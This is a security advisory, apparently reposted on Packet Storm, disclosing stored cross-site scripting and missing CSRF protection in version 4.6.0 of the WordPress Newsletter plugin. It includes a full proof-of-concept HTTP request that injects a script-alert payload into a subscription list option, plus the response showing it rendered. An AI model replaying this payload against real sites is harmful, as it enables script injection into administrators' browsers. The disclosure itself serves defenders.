WordPress Newsletter plugin version 4.6.0 suffers from cross site request forgery and cross site scripting vulnerabilities.
9cb12cdbcaf17c9df0d53118baf5921f395e74d64b4f4850784c04d99754e56dHello,
Wordpress Plugin: Newsletter 4.6.0 https://wordpress.org/plugins/newsletter/ is
vulnerable to CSRF and XSS.
The issue is supposed to be fixed in version 4.6.1 . See
https://wordpress.org/plugins/newsletter/changelog/ for more details.
1. Stored Cross-Site Scripting (XSS)
Authenticated administrators can inject html/js code (there is no CSRF
protection).
*Injection Location: *http://localhost/wordpress/wp-admin/admin.php?page=
newsletter_subscription_lists
*Method: *POST
*Retrieval Location: *http://localhost/wordpress/wp-admin/admin.php?page=
newsletter_users_massive
*Vulnerable Parameter(s): *
options[list_1]
options[list_2]
options[list_3]
options[list_4]
options[list_5]
options[list_6]
options[list_7]
options[list_8]
options[list_9]
options[list_10]
options[list_11]
options[list_12]
options[list_13]
options[list_14]
options[list_15]
options[list_16]
options[list_17]
options[list_18]
options[list_19]
options[list_20]
*Example Attack:*
*Request:*
POST /wordpress/wp-admin/admin.php?page=newsletter_subscription_lists
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0)
Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=
newsletter_subscription_lists
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1762
act=save&btn=&_wpnonce=7cad5407b5&_wp_http_referer=%2Fwordpress%2Fwp-admin%
2Fadmin.php%3Fpage%3Dnewsletter_subscription_lists&options%5Blist_1%5D=
test&options%5Blist_1_status%5D=1&options%5Blist_1_checked%
5D=1&options%5Blist_2%5D=&options%5Blist_2_status%5D=0&
options%5Blist_2_checked%5D=0&options%5Blist_3%5D=&options%
5Blist_3_status%5D=0&options%5Blist_3_checked%5D=0&options%
5Blist_4%5D=&options%5Blist_4_status%5D=0&options%5Blist_4_
checked%5D=0&options%5Blist_5%5D=&options%5Blist_5_status%
5D=0&options%5Blist_5_checked%5D=0&options%5Blist_6%5D=&
options%5Blist_6_status%5D=0&options%5Blist_6_checked%5D=0&
options%5Blist_7%5D=bi1x5<script>alert('spiderlabs')<%
2fscript>gjoce&options%5Blist_7_status%5D=0&options%5Blist_
7_checked%5D=0&options%5Blist_8%5D=&options%5Blist_8_status%
5D=0&options%5Blist_8_checked%5D=0&options%5Blist_9%5D=&
options%5Blist_9_status%5D=0&options%5Blist_9_checked%5D=0&
options%5Blist_10%5D=&options%5Blist_10_status%5D=0&options%
5Blist_10_checked%5D=0&options%5Blist_11%5D=&options%
5Blist_11_status%5D=0&options%5Blist_11_checked%5D=0&
options%5Blist_12%5D=&options%5Blist_12_status%5D=0&options%
5Blist_12_checked%5D=0&options%5Blist_13%5D=&options%
5Blist_13_status%5D=0&options%5Blist_13_checked%5D=0&
options%5Blist_14%5D=&options%5Blist_14_status%5D=0&options%
5Blist_14_checked%5D=0&options%5Blist_15%5D=&options%
5Blist_15_status%5D=0&options%5Blist_15_checked%5D=0&
options%5Blist_16%5D=&options%5Blist_16_status%5D=0&options%
5Blist_16_checked%5D=0&options%5Blist_17%5D=&options%
5Blist_17_status%5D=0&options%5Blist_17_checked%5D=0&
options%5Blist_18%5D=&options%5Blist_18_status%5D=0&options%
5Blist_18_checked%5D=0&options%5Blist_19%5D=&options%
5Blist_19_status%5D=0&options%5Blist_19_checked%5D=0&
options%5Blist_20%5D=&options%5Blist_20_status%5D=0&options%
5Blist_20_checked%5D=0
*Response:*
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:12 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102536
*Request:*
GET /wordpress/wp-admin/admin.php?page=newsletter_users_massive HTTP/1.1
Host: localhost:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: http://localhost:8888/wordpress/wp-admin/admin.php?
page=newsletter_users_massive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
*Response:*
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:37 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=edge
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98989
For preference <select id="options-list" name="options[list]"><option
value="1">(1) test</option><option value="2">(2) </option><option
value="3">(3) </option><option value="4">(4) </option><option value="5">(5)
</option><option value="6">(6) </option><option value="7">(7)
bi1x5<script>alert('spiderlabs')</script>gjoce</option><option
value="8">(8)
*Vulnerable PHP Code*
/newsletter/subscription/lists.php:51,52
/users/massive.php
--
Regards,
Keith Lee
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed